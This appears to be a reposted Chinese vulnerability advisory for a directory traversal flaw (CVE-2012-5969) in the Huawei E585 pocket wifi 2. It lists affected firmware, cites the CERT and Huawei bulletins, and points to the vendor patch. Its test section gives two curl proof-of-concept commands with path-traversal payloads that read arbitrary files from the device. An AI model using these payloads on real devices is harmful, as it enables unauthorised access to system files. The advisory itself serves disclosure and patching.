Huawei E585 pocket wifi 2设备目录穿越漏洞（CVE-2012-5969）

文章由LinuxBoy分享于2019-04-02 05:04:14热评（423）

Huawei E585 pocket wifi 2设备目录穿越漏洞（CVE-2012-5969）

发布日期：2012-12-13
更新日期：2012-12-15

受影响系统：
Huawei E585u-82 V100R001C84B503SP02
Huawei E585u-82 V100R001C64B503
Huawei E585u-82 V100R001C402B102SP01
Huawei E585u-82 V100R001C361B102
Huawei E585u-82 V100R001C326B102SP02
Huawei E585u-82 V100R001C323B505SP03
Huawei E585u-82 V100R001C308B102SP01
Huawei E585u-82 V100R001C09B102SP02
Huawei E585u-82 V100R001B106D00SP96C240
Huawei E585u-82 V100R001B106D00SP01C426
Huawei E585u-82 V100R001B106D00SP01C17
Huawei E585u-82 E585
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 56927
CVE(CAN) ID: CVE-2012-5969

Huawei E585是高速无线网络访问的调制解调器。

Huawei E585 pocket wifi 2设备没有正确限制文件的访问路径。攻击者可手动更改文件路径，以访问系统文件或将任意文件写入到系统。在调用系统接口之前，设备的Web服务器模块没有严格检查LAN端请求报文内包含的文件名和路径的合法性。厂商声明此漏洞仅可以从LAN端利用，无法从WAN端利用。

<*来源：John Bird

链接：http://www.kb.cert.org/vuls/id/871148
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-198239.htm
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

curl -X GET http://192.168.1.1/sdcard/..%2f..%2f"$1"
curl -X POST -d "action=request_page&page=sms.asp&req_page=../../../$1" http://192.168.1.1/en/sms.cgi

建议：
--------------------------------------------------------------------------------
厂商补丁：

Huawei
------
Huawei已经为此发布了一个安全公告（hw-198239）以及相应补丁:

hw-198239：Security Advisory-Web server vulnerabilities on Huawei E585 pocket Wi-Fi 2 device

链接：http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-198239.htm

补丁下载：http://www.huaweidevice.com/

推荐文章：

Huawei E585 pocket wifi 2设备目录穿越漏洞（CVE-2012-5969）